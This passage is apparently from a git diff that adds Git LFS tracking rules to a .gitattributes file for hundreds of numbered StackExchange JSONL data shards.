merge=lfs -text +data/stackexchange/1-1/1622_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1623_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1624_2289.jsonl 
filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1625_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1626_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1627_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1628_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1629_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/162_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1630_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1631_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1632_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1633_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1634_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1635_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1636_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1637_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1638_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1639_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/163_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1640_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1641_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1642_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1643_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1644_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1645_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1646_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1647_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1648_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1649_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/164_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1650_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1651_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1652_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1653_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1654_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1655_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1656_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1657_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1658_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1659_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/165_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1660_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1661_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1662_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1663_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1664_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1665_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1666_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/1667_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1668_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1669_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/166_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1670_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1671_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1672_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1673_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1674_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1675_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1676_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1677_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1678_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1679_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/167_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1680_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1681_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1682_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1683_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1684_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1685_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1686_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1687_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1688_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1689_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/168_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1690_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1691_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1692_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1693_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1694_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1695_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1696_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1697_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1698_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1699_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/169_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/16_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1700_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1701_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1702_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1703_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1704_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1705_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1706_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1707_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1708_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/1709_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/170_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1710_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1711_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1712_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1713_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1714_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1715_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1716_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1717_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1718_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1719_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/171_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1720_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1721_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1722_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1723_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1724_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1725_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1726_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1727_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1728_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1729_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/172_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1730_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1731_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1732_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1733_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1734_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1735_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1736_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1737_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1738_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1739_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/173_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1740_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1741_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1742_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1743_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1744_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1745_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1746_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1747_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1748_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1749_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/174_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1750_2289.jsonl 
filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1751_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1752_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1753_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1754_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1755_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1756_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1757_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1758_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1759_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/175_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1760_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1761_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1762_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1763_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1764_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1765_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1766_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1767_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1768_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1769_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/176_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1770_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1771_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1772_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1773_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1774_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1775_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1776_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1777_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1778_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1779_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/177_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1780_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1781_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1782_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1783_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1784_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1785_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1786_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1787_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1788_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1789_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/178_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1790_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1791_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1792_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/1793_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1794_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1795_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1796_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1797_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1798_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1799_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/179_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/17_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1800_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1801_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1802_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1803_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1804_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1805_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1806_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1807_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1808_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1809_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/180_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1810_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1811_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1812_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1813_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1814_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1815_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1816_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1817_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1818_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1819_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/181_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1820_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1821_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1822_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1823_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1824_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1825_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1826_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1827_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1828_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1829_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/182_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1830_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1831_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1832_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1833_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1834_2289.jsonl filter=lfs diff=lfs 
merge=lfs -text +data/stackexchange/1-1/1835_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1836_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1837_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1838_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1839_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/183_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1840_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1841_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1842_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1843_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1844_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1845_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1846_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1847_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1848_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1849_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/184_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1850_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1851_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1852_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1853_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1854_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1855_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1856_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1857_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1858_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1859_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/185_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1860_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1861_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1862_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1863_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1864_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1865_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1866_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1867_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1868_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1869_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/186_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1870_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1871_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1872_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1873_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1874_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1875_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1876_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1877_2289.jsonl 
filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1878_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1879_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/187_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1880_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1881_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1882_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1883_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1884_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1885_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1886_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1887_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1888_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1889_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/188_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1890_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1891_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1892_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1893_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1894_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1895_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1896_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1897_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1898_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1899_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/189_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/18_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1900_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1901_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1902_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1903_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1904_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1905_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1906_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1907_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1908_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1909_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/190_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1910_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1911_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1912_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1913_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1914_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1915_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1916_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1917_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1918_2289.jsonl filter=lfs diff=lfs merge=lfs -text 
+data/stackexchange/1-1/1919_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/191_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1920_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1921_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1922_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1923_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1924_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1925_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1926_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1927_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1928_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1929_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/192_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1930_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1931_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1932_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1933_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1934_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1935_2289.jsonl filter=lfs diff=lfs merge=lfs -text +data/stackexchange/1-1/1936_2289.jsonl filter=lfs diff=lfs merge=lfs -text 